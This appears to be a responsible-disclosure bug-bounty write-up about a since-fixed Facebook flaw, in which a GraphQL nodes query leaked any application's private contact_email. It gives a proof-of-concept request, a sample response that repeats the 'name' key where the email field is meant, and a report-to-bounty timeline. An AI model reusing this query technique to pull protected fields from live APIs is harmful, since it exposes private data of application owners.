Disclose contact_email of any Facebook application
In Facebook developer application dashboard there is field “contact_email” which means to be secret and use to communication between app admin/developer and Facebook.
However, accessing this field using Graph API was secured but changing query field to GraphQL call, I was able to access the Email ID of any Facebook Application.
Proof of concept
Request:
POST /graphql
Host: graph.facebook.com
q=nodes(35xxxxx28){name,contact_email}
Response:
{
"35xxxxx28": {
"name": "Facebook Application Name"
"name": "contact@company.com"
}
}
Impact
This could have let a malicious user to access the contact_email of any application using GraphQL.
Timeline
- 21 Nov, 2018 – Report Sent.
- 28 Nov, 2018 – Triaged.
- 29 Jan, 2019 – Fixed.
- 12 Feb, 2019 – Bounty Awarded.